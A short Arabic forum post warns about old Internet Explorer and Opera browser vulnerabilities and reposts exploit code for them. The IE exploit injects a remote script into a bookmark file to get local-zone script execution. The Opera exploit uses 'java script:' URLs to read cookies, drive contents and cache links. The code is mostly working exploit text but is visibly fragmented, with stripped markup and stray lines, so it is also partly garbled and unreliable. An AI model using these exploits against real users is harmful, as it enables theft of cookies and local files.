انتشرت مؤخرا ثغرتين خطيرتين في كلا المتصفحين IE و Opera ..
ولعل المتابع لمواقع السيكيورتي الشهيرة يلاحظ انهم لم يقدموا معلومات وافية حول هذه الثغرات وخاصة ثغرة IE وهذا يتبع لسياسات أمنية ...
طبعا حذرنا سابقا من هذه الثغرة في هذا الموضوع :
';
document.write(s);
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
METHOD: Favorite/bookmark based script execution
IMPACT: Scripting in local computer zone.
PATCH: NONE
NOTE: - This exploit is designed for Win 98/ME. In order
to work on win 2000/XP username must be known.
Please change bookmarkFile and scriptFile.
- Use the same payload.js as in the exploit
"Cookie based script execution".
----------------------------------------------------------------
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
<script>
//bookmarkFile = "c:/DOCUME~1/ADMINI~1/favorites/unique.url";
//bookmarkFile = "c:/windows/favorites/unique.url";
//scriptFile = "http://www.microsoft.com/unique/payload.js";
function injectBookmark(){
code = '<script>document.scripts[0].src="';
code += scriptFile+'"<'+'/script><'+'/html>';
window.external.AddFavorite('http://'+code,'unique');
}
function loadBookmark(){
alert("*** Loading bookmark file! ***");
document.location="file:///"+bookmarkFile+"."; // the important dot!
}
width=0>
Read google cookie
Read c:/ structure (win)
Read links in cache
<script>
function readCookie(){
cookie.location="java script:alert(document.cookie)";
}
function readFiles(){
t = 'java script:s="";l=document.links;';
t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
files.location = t;
}
function readCache(){
t = 'java script:s="";l=document.links;';
t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
cache.location = t;
}
------------------- CUT HERE -----------------------------------
EXPLOIT II:
===========
For versions of Opera not supporting the iframe tag the exploit must be
done using the frame tag instead. The following exploit has been tested on
Opera 6.01, 6.0, 5.12 (win).
------------------- CUT HERE -----------------------------------
------------------- CUT HERE -----------------------------------
payload.html:
------------------- CUT HERE -----------------------------------
Google
cookie
First
item in cache
First
file/directory in c: (win)
------------------- CUT HERE -----------------------------------
أرجو ان تقرؤها بعناية وتستفيدوا منها في الحذر من كثير من المواقع التي فعلا بدأت تستخدم هذه الثغرة لأغراض تجسسية او لا انسانية ...:( :(
لكم تحياتي .. (f)